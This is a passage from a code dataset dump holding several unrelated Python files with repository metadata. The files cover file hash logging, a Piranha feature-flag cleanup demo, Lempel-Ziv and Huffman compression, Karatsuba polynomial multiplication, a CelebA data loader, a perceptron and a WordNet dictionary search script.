writeToLog(logFileName, '>>> HASH VERIFICATION ENDED: files verified: '\\\r\n + str(totalFilesVerified) + ' files missing in dir: '\\\r\n + str(filesMissing))\r\n\r\ndef logExists(logName):\r\n return os.path.isfile(logName)\r\n\r\n\r\ndef initLog(logName):\r\n with open(logName, 'w') as logFile:\r\n logFileWriter = csv.writer(logFile)\r\n logFileWriter.writerow([time.strftime('%d/%m/%Y ') + time.strftime('%H:%M:%S'), '[>>> LOG FILE CREATED] > '])\r\n logFile.close()\r\n\r\n\r\ndef writeToLog(logName, message):\r\n with open(logName, 'a') as logFile:\r\n logFileWriter = csv.writer(logFile)\r\n logFileWriter.writerow([time.strftime('%d/%m/%Y ') + time.strftime('%H:%M:%S'), '[' + message + '] > '])\r\n logFile.close()\r\n \r\n\r\ndef dict_to_elem(dictionary):\r\n item = elTree.Element('FILEITEM') # Item names cannot contain spaces for proper XML read in XML editors.\r\n for key in dictionary:\r\n field = elTree.Element(key.replace(' ',''))\r\n field.text = dictionary[key]\r\n item.append(field)\r\n return item\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # the following two lines are kept in case of debugging without the cmd line\r\n # mainVerify()\r\n # mainGenerateHashes('D:\\\\PASAR A USB\\\\')\r\n logFile, xmlDB = 's3curefilelog.csv', 's3curefiledb.xml'\r\n\r\n if not logExists(logFile):\r\n initLog(logFile)\r\n # Check the command line arguments\r\n if len(sys.argv) == 2:\r\n writeToLog(logFile, 'cmd line received: ' + sys.argv[1])\r\n if sys.argv[1] == '-v': # <<<--- if the command passed was -v, then verify files in the path against the XML database\r\n if os.path.exists(xmlDB): # if a -v command was passed, chech if xml db exists\r\n mainVerify()\r\n else:\r\n writeToLog(logFile, '* WARNING 04 * xml database does not exist ')\r\n sys.exit(2)\r\n else:\r\n dirArgument = sys.argv[1] + '\\\\' # it works if the path is ended in \\ or not\r\n if not os.path.exists(dirArgument):\r\n writeToLog(logFile, 'Path does not exist: ' + sys.argv[1])\r\n elif not os.path.isdir(dirArgument):\r\n writeToLog(logFile, 'Path is not a directory: ' + sys.argv[1])\r\n else:\r\n print(dirArgument)\r\n mainGenerateHashes(dirArgument) # <<<--- If the command passed was a path, generate the hashes\r\n sys.exit(0)\r\n else:\r\n writeToLog(logFile, '* WARNING 03 * incorrect cmd line USAGE: s3curefile (PATH or -v)')\r\n sys.exit(1)","repo_name":"Averaguilar/S3CUREFILE","sub_path":"s3curefile.py","file_name":"s3curefile.py","file_ext":"py","file_size_in_byte":6943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32000766245","text":"from os.path import join, dirname, getmtime, exists\nfrom polyglot_piranha import Rule, RuleGraph, execute_piranha, PiranhaArguments\nimport logging\nfrom logging import info\n\nfeature_flag_dir = join(dirname(__file__), \"feature_flag_cleanup_using_py_api\")\n\n\ndef run_java_ff_demo():\n info(\"Running the stale feature flag cleanup demo for Java\")\n\n directory_path = join(feature_flag_dir, \"java\")\n modified_file_path = join(directory_path, \"SampleClass.java\")\n\n update_is_treated = Rule(\n name=\"update_is_treated\",\n # :[e] matches any node (its like a hole) and @flag_name refers to the substitution\n query='cs :[e].isTreated(\"@flag_name\")',\n replace_node=\"*\",\n # @treated refers to the substitution\n replace=\"@treated\",\n groups={\"replace_expression_with_boolean_literal\"},\n # This is a list of holes that need to be filled in for the rule to be applied\n holes={\"treated\", \"flag_name\"}\n )\n\n args = PiranhaArguments(\n \"java\",\n paths_to_codebase=[directory_path],\n substitutions={\"flag_name\": \"SAMPLE_STALE_FLAG\", \"treated\": \"true\"},\n rule_graph=RuleGraph(rules=[update_is_treated], edges=[])\n )\n\n output_summaries = execute_piranha(args)\n\n old_mtime = getmtime(modified_file_path)\n\n assert len(output_summaries) == 1\n\n for summary in output_summaries:\n assert len(summary.rewrites) > 0\n\n new_mtime = getmtime(modified_file_path)\n\n assert old_mtime < new_mtime\n\n\nFORMAT = \"%(levelname)s %(name)s %(asctime)-15s %(filename)s:%(lineno)d %(message)s\"\nlogging.basicConfig(format=FORMAT)\nlogging.getLogger().setLevel(logging.DEBUG)\n\nrun_java_ff_demo()\nprint(\"Completed running the stale feature flag cleanup demos\")\n","repo_name":"uber/piranha","sub_path":"demo/stale_feature_flag_cleanup_demos_using_py_api.py","file_name":"stale_feature_flag_cleanup_demos_using_py_api.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":2163,"dataset":"github-code","pt":"67"} +{"seq_id":"11997170282","text":"import string\n\n#FUNZIONE CHE, DATO UN TESTO IN INGRESSO, CREA IL DIZIONARIO DELLE ENTRATE RELATIVO ALLA CODIFICA LEMPEL-ZIV \ndef LZ(text):\n #inizializzo l'offset per lo scorrimento di text\n m = 1\n #inizializzo il numero di riferimento per i blocchi\n ref = 1\n #inizializzo il dizionario contenente i blocchi con i relativi puntatori (ref)\n refblockDiz = {\"\": 0, text[0]: ref}\n #inizializzo il dizionario contenente le entrate \n entranceDiz = {\"0\": text[0]}\n for i in range(2, len(text)+1):\n padding = \"\"\n #estraggo il primo blocco da text controllando di non averlo gia analizzato\n textTemp = text[m:i]\n if textTemp in refblockDiz:\n continue\n #aggiorno il dizionario dei riferimenti ai blocchi\n ref += 1\n refblockDiz.update({textTemp: ref})\n #gestisco il padding di bit per evitare ambiguità in entranceDiz\n if len(bin(ref-1)[2:]) > len(bin(refblockDiz[textTemp[:-1]])[2:]):\n diff = len(bin(ref-1)[2:]) - len(bin(refblockDiz[textTemp[:-1]])[2:])\n while diff > 0:\n padding += \"0\"\n diff -= 1\n #aggiorno il dizionario delle entrate e l'offset per scorrere text\n entranceDiz.update({padding + bin(refblockDiz[textTemp[:-1]])[2:]: textTemp[-1]})\n m = i\n \n #gestisco l'ultimo blocco della stringa da codificare nel caso questo sia un blocco già analizzato in precedenza\n if textTemp in refblockDiz:\n padding = \"\"\n ref += 1\n refblockDiz.update({textTemp: ref})\n if len(bin(ref-1)[2:]) > len(bin(refblockDiz[textTemp[:-1]])[2:]):\n diff = len(bin(ref-1)[2:]) - len(bin(refblockDiz[textTemp[:-1]])[2:])\n while diff > 0:\n padding += \"0\"\n diff -= 1\n entranceDiz.update({padding + bin(refblockDiz[textTemp[:-1]])[2:]: textTemp[-1]})\n print(\"il dizionario relativo ai riferimenti è: \", refblockDiz)\n print(\"il dizionario relativo alle entrate è: \", entranceDiz)\n return entranceDiz\n\n#FUNZIONE CHE CODIFICA text CON LZ USANDO IL DIZ DELLE ENTRATE GENERATO DA LZ() ED UN DIZIOANRIO\n#CHE ASSOCIA AD OGNI LETTERA UN SIMBOLO DI DEFAULT\ndef LZCode(text, entranceDiz, defaultDiz):\n #inizializzo la stringa che conterrà il testo codificato\n encodedtext = \"\"\n #scorro il dizionario delle entrate aggiungendo a encodedtext ad ogni passo, oltre al codice dell'entrata,\n #il simbolo associato all'ultima lettera del blocco che sto codificando\n for i in entranceDiz.keys():\n encodedtext += (i + defaultDiz[entranceDiz[i]])\n print(\"il testo codifiicato con lempel-ziv è: \", encodedtext)\n return encodedtext\n\n#FUNZIONE CHE GENERA UN CODICE DI Huffman RELATIVO AD alphabet\ndef Huffman(alphabet, prob):\n #creo la lista che conterrà, in posizione i, i due elementi uniti nel i-esimo passo della fase 1 dell'algoritmo\n mergeOrder = []\n #creo il dizionario in cui salverò le associazioni simboli-codice\n code = {}\n\n #inizio fase 1 dell'algoritmo\n while len(prob) != 1:\n #salvo l'indice relativo alla probabilità minore del vettore prob\n min1 = prob.index(min(prob))\n #salvo l'elemento di prob con valore minore e lo rimuovo da prob\n probmin1 = prob.pop(min1)\n #salvo l'elemento di alphabet con probabilità minore e lo rimuovo da alphabet \n alphabetmin1 = alphabet.pop(min1)\n #salvo l'indice relativo alla seconda probabilità minore del vettore prob\n min2 = prob.index(min(prob))\n #aggiorno il vettore prob, sostituendo nella posizione relativa al secondo elemento minore\n #la somma delle due probabilità minori dell'iterazione corrente\n prob[min2] = probmin1 + prob[min2]\n #salvo in mergeOrder i due elementi di alphabet che ho appena unito\n mergeOrder.append([alphabet[min2], alphabetmin1])\n #aggiorno alphabet sostituendo nella posizione relativa al secondo elemento con probabilità minore\n #una lista contenente i due elementi che ho unito\n alphabet[min2] = [alphabet[min2], alphabetmin1]\n\n #inizio fase 2 dell'algoritmo\n #salvo e rimuovo l'ultimo elemento di mergeOrder, che conterrà i due elementi che\n #ho unito nell'ultima iterazione della fase 1\n lastMerged = mergeOrder.pop(len(mergeOrder)-1)\n #inizializzo il dizionario assegnando ai due elementi che ho unito nell'ultima\n #iterazione della fase 1 i codici 0 ed 1\n code.update({str(lastMerged[0]): \"0\", str(lastMerged[1]): \"1\"})\n while len(mergeOrder) > 0:\n lastMerged = mergeOrder.pop(len(mergeOrder)-1)\n #salvo in codeword il codice, all'interno del dizionario, relativo alla chiave\n #rappresentante l'elemento che devo \"scoppiare\" nella corrente iterazione\n codeword = code[str(lastMerged)]\n #rimuovo questo elemento dal dizionario per rimpiazzarlo con due elementi aventi\n #chiavi rappresentanti le componenti della chiave rimossa e valori rispettivamente pari al codice\n #relativo alla chiave rimossa, con l'aggiunta in coda di 0 e 1\n code.pop(str(lastMerged))\n code.update({str(lastMerged[0]): codeword + \"0\", str(lastMerged[1]): codeword + \"1\"})\n print(\"il codice rappresentato in forma di dizionario è: \\n\", code)\n return code\n\n#FUNZIONE CHE CODIFICA TEXT USANDO IL CODICE HUFFMAN GENERATO DA Huffman()\ndef HuffmanCode(text, code):\n encodedtext = \"\"\n for l in text:\n encodedtext += code[l]\n print(\"il testo codificato con huffman è: \", encodedtext)\n return encodedtext\n\n#FUNZIONE CHE FORMATTA IL TESTO IN MAIUSCOLO ELIMINANDO SPAZI E PUNTEGGIATURA\ndef textFormatting(text):\n for i in string.punctuation:\n text = text.replace(i, \"\")\n text = text.replace(\"—\", \"\")\n text = text.replace(\"’\", \"\")\n text = text.replace(\" \", \"\")\n text = text.upper()\n #print(text)\n return text\n\n#FUNZIONE CHE ESEGUE IL CONFRONTO TRA LE PERCENTUALI DI COMPRESSIONE DI HUFFMAN E LEMPEL-ZIV\ndef comparison(text, defaultDiz, alphabet, prob):\n #formatto il testo in maiuscolo eliminando spazi e punteggiatura\n text = textFormatting(text)\n textBlocks = []\n compressionPercH = []\n compressionPercLZ = []\n n = 10\n m = len(text)//n\n code = Huffman(alphabet, prob)\n #divido text in n blocchi e li salvo in textBlocks\n for i in range(n):\n textBlocks.append(text[i*m: (i+1)*m])\n #per ogni blocco genero il codice corrispondente con i due metodi e salvo la percentuale di compressione\n #per Huffman e Lempel-Ziv rispettivamente in compressionPercH e compressionPercLZ\n for b in textBlocks:\n #calcolo compressione per Huffman\n encodedH = HuffmanCode(b, code)\n percH = ((5*len(b) - len(encodedH)) / (5*len(b))) * 100\n compressionPercH.append(percH)\n #calcolo compressione per Lempel-Ziv\n entranceDiz = LZ(b)\n encodedLZ = LZCode(b, entranceDiz, defaultDiz)\n percLZ = ((5*len(b) - len(encodedLZ)) / (5*len(b))) * 100\n compressionPercLZ.append(percLZ)\n #calcolo la media delle due liste contenenti le percentuali di compressione per singoli blocchi\n meancompressionH = (sum(compressionPercH)) / n\n meancompressionLZ = (sum(compressionPercLZ)) / n\n print(\"la percentuale di compressione media usando Huffman è: \", meancompressionH)\n print(\"la percentuale di compressione media usando LZ è: \", meancompressionLZ)\n\n#FUNZIONE DI TEST\ndef test():\n alphabet = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\"]\n prob = [0.08167, 0.01492, 0.02782, 0.04253, 0.12702, 0.02228, 0.02228, 0.06094, 0.06966, 0.00153, 0.00772, 0.04025, 0.02406, 0.06749, 0.07507, 0.01929, 0.00095, 0.05987, 0.06327, 0.09056, 0.02758, 0.00978, 0.02360, 0.00150, 0.01974, 0.00074]\n defaultDiz = {\"A\": \"0\", \"B\": \"1\", \"C\": \"11\", \"D\": \"100\", \"E\": \"101\", \"F\": \"110\", \"G\": \"111\", \"H\": \"1000\", \"I\": \"1001\", \"J\": \"1010\", \"K\": \"1011\", \"L\": \"1100\", \"M\": \"1101\", \"N\": \"1110\", \"O\": \"1111\", \"P\": \"10000\", \"Q\": \"10001\", \"R\": \"10010\", \"S\": \"10011\", \"T\": \"10100\", \"U\": \"10101\", \"V\": \"10110\", \"W\": \"10111\", \"X\": \"11000\", \"Y\": \"11001\", \"Z\": \"11010\"}\n text1 = \"AABABBBABAABABBBABBABB\"\n #testo la funzione di codifica su text1\n entranceDiz = LZ(text1)\n LZCode(text1, entranceDiz, defaultDiz)\n f = open(r\"dummytext.txt\")\n text2 = f.read()\n f.close()\n #metto a confronto la codifica LZ con quella di Huffman su 10 blocchi estratti da text2\n print(\"\\nINIZIO FASE DI COMPARAZIONE\\n\")\n comparison(text2, defaultDiz, alphabet, prob)\n \ntest()","repo_name":"carlocek/data-security-exercises","sub_path":"LempelZiv.py","file_name":"LempelZiv.py","file_ext":"py","file_size_in_byte":8651,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14822383205","text":"# -*- coding: utf-8 -*-\n\n# Q1\n\ndef poly_mult(P,Q):\n product = [0 for _ in range(len(P) + len(Q) -1 )]\n for i in range(len(P)):\n for j in range(len(Q)):\n if (i+j < len(P) + len(Q) - 1):\n product[i+j] += P[i] * Q[j]\n return product\n\ndef cost_mult(n): \n return (2*n*n -n - n +1)\n \n# Q2\n\ndef poly_add(P,Q):\n size1 = len(P)\n size2 = len(Q)\n if size1 > size2:\n s = P\n for i in range(size2):\n s[i] += Q[i]\n else:\n s = Q\n for i in range(size1):\n s[i] += P[i]\n return s\n \ndef neg(P):\n Q = [0 for _ in range(len(P))]\n for i in range(len(P)):\n Q[i] = -P[i]\n return Q\n \ndef shift(P,k):\n size = len(P) +k \n result = [0 for _ in range(size)]\n for i in range(len(P)):\n result[i+k] = P[i]\n return result \n \n# Q3 \n \ndef poly_kara_mult(P,Q):\n n = len(P)\n if n == 1:\n return [P[0] * Q[0]]\n k = (n+1)//2 \n P0 = [P[i] for i in range(k)]\n P1 = [P[i] for i in range(k, n)]\n Q0 = [Q[i] for i in range(k)]\n Q1 = [Q[i] for i in range(k, n)]\n H0 = poly_kara_mult(P0, Q0)\n H2 = poly_kara_mult(P1, Q1)\n H1 = poly_kara_mult(poly_add(P0,P1), poly_add(Q0, Q1))\n \n return poly_add(H0, \n poly_add(\n shift(poly_add(\n poly_add(H1, neg(H0)), neg(H2)), k),shift(H2, 2*k)))\n\n \n \n \n \n \ndef cost_poly_kara_mult(n):\n if n ==1 : return 1\n return 3 * cost_poly_kara_mult((n+1)//2) + 4*n\n\n\n# Q4 \n\ndef cost_poly_tc3_mult(n):\n if n == 1: \n return 1\n elif n == 2: \n return 3\n else: \n return 5 * cost_poly_tc3_mult((n+2)//3) + 30 *n\n pass\n\n# Q5 hybrid\n \ndef poly_switch_mult(d,P,Q):\n n = len(P)\n if n <= d:\n return poly_mult(P, Q)\n else:\n k = (n+1)//2 \n P0 = [P[i] for i in range(k)]\n P1 = [P[i] for i in range(k, n)]\n Q0 = [Q[i] for i in range(k)]\n Q1 = [Q[i] for i in range(k, n)]\n H0 = poly_switch_mult(d,P0, Q0)\n H2 = poly_switch_mult(d,P1, Q1)\n H1 = poly_switch_mult(d,poly_add(P0,P1), poly_add(Q0, Q1))\n \n return poly_add(H0, \n poly_add(\n shift(poly_add(\n poly_add(H1, neg(H0)), neg(H2)), k),shift(H2, 2*k)))\n\n \n\ndef cost_switch_mult(d,n):\n if n <= d: \n return 2*n**2 - 2*n +1 \n else:\n return 3* cost_switch_mult(d, (n+1)//2) + 4*n\n\n \n","repo_name":"yassine-turki/Polytechnique_Courses","sub_path":"CSE202/Tutorial_2/mult.py","file_name":"mult.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32676870842","text":"from __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport os\nimport random\nimport numpy as np\nfrom PIL import Image\nfrom random import shuffle\nfrom scipy.misc import imresize\n\nimport torch\nimport torchvision.datasets as dset\nfrom torch.utils.data.dataset import Dataset\n\nVALID_PARTITIONS = {'train': 0, 'val': 1, 'test': 2}\nATTR_TO_IX_DICT = {'Sideburns': 30, 'Black_Hair': 8, 'Wavy_Hair': 33, 'Young': 39, 'Heavy_Makeup': 18, \n 'Blond_Hair': 9, 'Attractive': 2, '5_o_Clock_Shadow': 0, 'Wearing_Necktie': 38, \n 'Blurry': 10, 'Double_Chin': 14, 'Brown_Hair': 11, 'Mouth_Slightly_Open': 21, \n 'Goatee': 16, 'Bald': 4, 'Pointy_Nose': 27, 'Gray_Hair': 17, 'Pale_Skin': 26, \n 'Arched_Eyebrows': 1, 'Wearing_Hat': 35, 'Receding_Hairline': 28, 'Straight_Hair': 32, \n 'Big_Nose': 7, 'Rosy_Cheeks': 29, 'Oval_Face': 25, 'Bangs': 5, 'Male': 20, 'Mustache': 22, \n 'High_Cheekbones': 19, 'No_Beard': 24, 'Eyeglasses': 15, 'Bags_Under_Eyes': 3, \n 'Wearing_Necklace': 37, 'Wearing_Lipstick': 36, 'Big_Lips': 6, 'Narrow_Eyes': 23, \n 'Chubby': 13, 'Smiling': 31, 'Bushy_Eyebrows': 12, 'Wearing_Earrings': 34}\nATTR_IX_TO_KEEP = [4, 5, 8, 9, 11, 12, 15, 17, 18, 20, 21, 22, 26, 28, 31, 32, 33, 35]\nIX_TO_ATTR_DICT = {v:k for k,v in ATTR_TO_IX_DICT.iteritems()}\nN_ATTRS = len(ATTR_IX_TO_KEEP)\n\n\nclass CelebAttributes(Dataset):\n \"\"\"Load images of celebrities and attributes.\"\"\"\n def __init__(self, partition='train', image_transform=None, attr_transform=None):\n self.partition = partition\n self.image_transform = image_transform\n self.attr_transform = attr_transform\n \n assert partition in VALID_PARTITIONS.keys()\n self.image_paths = load_eval_partition(partition)\n self.attr_data = load_attributes(self.image_paths, partition)\n self.size = int(len(self.image_paths))\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: (image, target) where target is index of the target class.\n \"\"\"\n image_path = os.path.join('./data/img_align_celeba/', self.image_paths[index])\n attr = self.attr_data[index]\n\n # open PIL Image\n image = Image.open(image_path)\n image = image.convert('RGB')\n\n if self.image_transform is not None:\n image = self.image_transform(image)\n\n if self.attr_transform is not None:\n attr = self.attr_transform(attr)\n\n return image, attr\n\n def __len__(self):\n return self.size\n\n\ndef load_eval_partition(partition):\n eval_data = []\n with open('./data/Eval/list_eval_partition.txt') as fp:\n rows = fp.readlines()\n for row in rows:\n path, label = row.strip().split(' ')\n label = int(label)\n if label == VALID_PARTITIONS[partition]:\n eval_data.append(path)\n return eval_data\n\n\ndef load_attributes(paths, partition):\n if os.path.isfile('./data/Anno/attr_%s.npy' % partition):\n attr_data = np.load('./data/Anno/attr_%s.npy' % partition)\n else:\n attr_data = []\n with open('./data/Anno/list_attr_celeba.txt') as fp:\n rows = fp.readlines()\n for ix, row in enumerate(rows[2:]):\n row = row.strip().split()\n path, attrs = row[0], row[1:]\n if path in paths:\n attrs = np.array(attrs).astype(int)\n attrs[attrs < 0] = 0\n attr_data.append(attrs)\n attr_data = np.vstack(attr_data).astype(np.int64)\n attr_data = torch.from_numpy(attr_data).float()\n return attr_data[:, ATTR_IX_TO_KEEP]\n\n\ndef tensor_to_attributes(tensor):\n \"\"\"\n @param tensor: PyTorch Tensor\n D dimensional tensor\n @return attributes: list of strings\n \"\"\"\n attrs = []\n n = tensor.size(0)\n tensor = torch.round(tensor)\n for i in xrange(n):\n if tensor[i] > 0.5:\n attr = IX_TO_ATTR_DICT[ATTR_IX_TO_KEEP[i]]\n attrs.append(attr)\n return attrs\n\n","repo_name":"wenxuanliu/multimodal-vae","sub_path":"celeba/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"329677337","text":"file = open(\"11.txt\")\ndirs = file.readline().split(\",\")\n#dirs = \"se,sw,se,sw,sw\".split(\",\")\n# x is SE\n# y is S\n# z is (1,-1) is NE\n\ncurr = [0, 0]\nfurthest = 0\nfor i in dirs:\n if i == \"se\":\n dir = [1, 0]\n elif i == \"nw\":\n dir = [-1, 0]\n elif i == \"s\":\n dir = [0, 1]\n elif i == \"n\":\n dir = [0, -1]\n elif i == \"ne\":\n dir = [1, -1]\n elif i == \"sw\":\n dir = [-1, 1]\n curr[0] += dir[0]\n curr[1] += dir[1]\n distance = max(abs(curr[0]), abs(curr[1]), abs(curr[0] + curr[1]))\n furthest = max(furthest, distance)\n\nprint(curr)\nprint(furthest)\n","repo_name":"terencesll/AdventOfCode","sub_path":"2017/11a.py","file_name":"11a.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19464720711","text":"import random\n\n\n# ret = vector1.vector2\ndef inner_product(vector1, vector2):\n return sum(vector1[i]*vector2[i] for i in range(0, len(vector1)))\n\n# ret = value*vector1 + vector2\ndef dot_product_add(value, vector1, vector2):\n return [vector1[i]*value + vector2[i] for i in range(0, len(vector1))]\n\n\ndef cross_product(Ax, Ay, Bx, By, Cx, Cy):\n return (Bx - Ax) * (Cy - Ay) - (By - Ay) * (Cx - Ax)\n\n\ndef perceptron_train(training_set, label, learning_rate = 1.0):\n num = len(training_set)\n if num == 0:\n raise \"the training set is empty\"\n if len(label) != num:\n raise \"the number of training sample is not the same with labels\"\n for sample in training_set:\n sample.append(1)\n dim = len(training_set[0])\n model = [0] * dim\n x = 0\n while True:\n error_count = 0\n for i in range(0, num):\n # print 'ITERATION - {0}'.format(x)\n if label[i]*inner_product(model, training_set[i]) <= 0:\n x += 1\n model = dot_product_add(label[i]*learning_rate, training_set[i], model)\n error_count = error_count + 1\n if error_count == 0:\n return model, x\n\n\ndef perceptron_predict(test_set, model, threshold = 0):\n prediction = []\n for sample in test_set:\n sample.append(1)\n if inner_product(sample, model) > threshold:\n prediction.append(1)\n else:\n prediction.append(-1)\n return prediction\n\n\n\ndef generate_training_points(N):\n # training_set = [[.3,.3], [.4,.3], [.1,.1], [.2,.1]]\n # label = [1, 1, -1, -1]\n # y = mx + b\n # create a line\n xy1 = (random.uniform(-1, 1), random.uniform(-1, 1))\n xy2 = (random.uniform(-1, 1), random.uniform(-1, 1))\n # y - y1 = m(x - x1)\n x1, y1 = xy1\n x2, y2 = xy2\n m = (y1 - y2) / (x1 - x2)\n # y - y1 = m * (x - x1)\n # y = mx - mx1 + y1\n b = -(m*x1) + y1\n # gather training data\n processing = True\n while processing:\n training_set = []\n label = []\n for x in range(N):\n xy3 = (random.uniform(-1, 1), random.uniform(-1, 1))\n x3, y3 = xy3\n training_set.append([x3,y3])\n cp = cross_product(x1, y1, x2, y2, x3, y3)\n if cp < 0:\n label.append(-1)\n elif cp > 0:\n label.append(1)\n if len(label) == N:\n processing = False\n return (xy1,xy2), training_set, label\n\n\ndef generate_test_points(f, M):\n # test_set = [[.5,.5], [.1,.1]]\n xy1, xy2 = f\n x1, y1 = xy1\n x2, y2 = xy2\n processing = True\n while processing:\n test_set = []\n label = []\n for x in range(M):\n xy3 = (random.uniform(-1, 1), random.uniform(-1, 1))\n x3, y3 = xy3\n test_set.append([x3,y3])\n cp = cross_product(x1, y1, x2, y2, x3, y3)\n if cp < 0:\n label.append(-1)\n elif cp > 0:\n label.append(1)\n if len(label) == M:\n processing = False\n return test_set, label\n\n\nites = []\nerrors = []\nfor x in range(0, 1000):\n x\n f, training_set, label = generate_training_points(100)\n model, x = perceptron_train(training_set, label)\n ites.append(x)\n test_set, test_label = generate_test_points(f, 1000)\n prediction = perceptron_predict(test_set, model)\n error = 0\n for f, b in zip(test_label, prediction):\n if f != b:\n error += 1\n errors.append(float(error)/float(1000))\n\n\n\n\n\nsum(ites)/len(ites)\nsum(errors)/len(errors)\n\n","repo_name":"figgybit/alogrithms","sub_path":"perceptron/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18946161276","text":"import cgi\nimport html\nimport os\nimport sys\nimport textwrap\nimport tkrzw_dict\nimport tkrzw_wordnet_searcher\nimport urllib\n\n\nPAGE_WIDTH = 100\nCGI_DATA_PREFIX = \"wordnet\"\n\n\ndef PrintWrappedText(text, indent, multi_byte):\n page_width = PAGE_WIDTH\n if multi_byte:\n page_width = int(page_width * 0.6)\n for line in textwrap.wrap(text, page_width - indent):\n print((\" \" * indent) + line)\n\n\ndef PrintResultWord(key, entry, show_details):\n print(\"---- {} ----\".format(key))\n if show_details:\n score = entry.get(\"score\")\n if score:\n print(\"score: {:.6f}\".format(float(score)))\n search_score = entry.get(\"search_score\")\n if search_score:\n print(\"search_score: {:.6f}\".format(float(search_score)))\n for item in entry[\"item\"]:\n print()\n title = item.get(\"word\") or key\n pos = item.get(\"pos\")\n if pos:\n title += \" [{}]\".format(pos)\n print(\" {}\".format(title))\n translations = item.get(\"translation\")\n if translations:\n translations = tkrzw_dict.DeduplicateWords(translations)\n if not show_details:\n translations = translations[:5]\n PrintWrappedText(format(\", \".join(translations)), 4, True)\n gloss = item.get(\"gloss\")\n if gloss:\n PrintWrappedText(gloss, 4, False)\n if show_details:\n attrs = (\"synonym\", \"hypernym\", \"hyponym\", \"antonym\", \"similar\", \"derivative\")\n for attr in attrs:\n values = item.get(attr)\n if values:\n PrintWrappedText(\"{}: {}\".format(attr, \", \".join(values)), 6, False)\n score = item.get(\"score\")\n if score:\n PrintWrappedText(\"score: {:.6f}\".format(float(score)), 6, False)\n else:\n synonyms = item.get(\"synonym\")\n if synonyms:\n PrintWrappedText(\"syn: {}\".format(\", \".join(synonyms)), 6, False)\n print()\n\n\ndef main():\n args = sys.argv[1:]\n data_prefix = tkrzw_dict.GetCommandFlag(args, \"--data_prefix\", 1) or \"wordnet\"\n direction = tkrzw_dict.GetCommandFlag(args, \"--direction\", 1) or \"auto\"\n show_details = tkrzw_dict.GetCommandFlag(args, \"--details\", 0)\n text = \" \".join(args)\n if not text:\n raise RuntimeError(\"words are not specified\")\n reverse = False\n if direction == \"auto\":\n reverse = tkrzw_dict.PredictLanguage(text) != \"en\"\n elif direction == \"reverse\":\n reverse = True\n searcher = tkrzw_wordnet_searcher.WordNetSearcher(data_prefix)\n if reverse:\n result = searcher.SearchReverse(text)\n else:\n result = searcher.SearchExact(text)\n if result:\n for key, entry in result:\n PrintResultWord(key, entry, show_details)\n else:\n print(\"No result.\")\n\n\ndef esc(expr):\n if expr is None:\n return \"\"\n return html.escape(str(expr), True)\n\n\ndef PrintResultWordCGI(key, entry, show_details):\n print('
')\n print('

{}

'.format(esc(key)))\n for item in entry[\"item\"]:\n print('
')\n word = item.get(\"word\") or key\n print('

', end='')\n print('{}'.format(\n esc(urllib.parse.quote(word)), esc(word)))\n pos = item.get(\"pos\")\n if pos:\n print('[{}]'.format(esc(pos)), end='')\n print('

')\n translations = item.get(\"translation\")\n if translations:\n translations = tkrzw_dict.DeduplicateWords(translations)\n translations = translations[:5]\n print('
', end='')\n esc_trans = []\n for tran in translations:\n esc_trans.append('{}'.format(\n esc(urllib.parse.quote(tran)), esc(tran)))\n print(', '.join(esc_trans), end='')\n print('
')\n gloss = item.get(\"gloss\")\n if gloss:\n print('
{}
'.format(esc(gloss)))\n if show_details:\n attrs = (\"synonym\", \"hypernym\", \"hyponym\", \"antonym\", \"similar\", \"derivative\")\n else:\n attrs = ('synonym',)\n for attr in attrs:\n values = item.get(attr)\n if values:\n print('
', end='')\n print('{}: '.format(esc(attr)), end='')\n esc_relwords = []\n for value in values:\n esc_relwords.append('{}'.format(\n esc(urllib.parse.quote(value)), esc(value)))\n print(', '.join(esc_relwords), end='')\n print('
')\n print('
')\n print('
')\n\n\ndef main_cgi():\n script_name = os.environ.get(\"SCRIPT_NAME\", sys.argv[0])\n params = {}\n form = cgi.FieldStorage()\n for key in form.keys():\n value = form[key]\n params[key] = value.value\n query = params.get(\"q\") or \"\"\n print(\"\"\"Content-Type: application/xhtml+xml\n\n\n\nWordNet Search\n\n\n\n
\n

WordNet Search

\n
\n
\n
\nQuery: \n\n
\n
\n
\"\"\".format(esc(script_name), esc(query)))\n if query:\n reverse = tkrzw_dict.PredictLanguage(query) != \"en\"\n searcher = tkrzw_wordnet_searcher.WordNetSearcher(CGI_DATA_PREFIX)\n if reverse:\n result = searcher.SearchReverse(query)\n else:\n result = searcher.SearchExact(query)\n if result:\n show_details = not reverse\n for key, entry in result:\n PrintResultWordCGI(key, entry, show_details)\n else:\n print('
No result.
')\n else:\n print(\"\"\"
\n

This site demonstrats a search system on a English-Japanese dictionary. If you input an English word, entries whose titles match it are shown. If you input a Japanese word, entries whose translations match it are shown.

\n

This service uses data from WordNet and Japanese WordNet.

\n\n
\"\"\")\n print(\"\"\"\n
